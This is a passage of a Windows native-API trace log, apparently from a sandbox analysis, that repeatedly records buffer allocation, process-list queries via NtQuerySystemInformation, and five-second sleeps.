ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.726] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.726] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.727] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.727] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.729] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.729] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.741] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.742] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.742] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.743] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.743] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.746] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.747] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.758] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.758] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.759] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.759] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.759] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.761] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.762] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.772] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.773] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.773] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.773] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.774] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.775] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.776] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.788] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.788] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.789] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.789] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.789] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.791] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.792] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.804] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.804] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.805] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.805] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.805] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.807] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.808] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.819] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.819] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.820] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.820] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.820] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.823] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.835] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.835] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.835] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.836] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.836] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.838] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.850] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.851] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.851] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.851] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.852] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.853] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.854] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.867] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.867] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.868] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.868] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.868] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.870] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.871] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.882] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.882] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.883] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.883] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.883] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.885] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.885] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.898] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.898] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.898] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.899] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.899] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.901] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.901] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.913] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.914] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.914] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.914] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.917] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.928] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.929] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.929] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.929] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.930] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.931] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.932] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.954] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.954] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.954] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.956] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.961] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.963] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.964] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.976] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.976] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.977] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.977] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.977] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.979] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0161.991] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0161.991] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0161.992] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0161.992] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0161.992] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0161.994] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0161.995] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.007] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.008] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.008] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.010] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.010] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.022] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.022] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.023] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.023] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.023] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.026] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.038] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0162.038] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0162.038] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0162.039] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0162.040] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0162.041] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0162.053] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0162.054] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 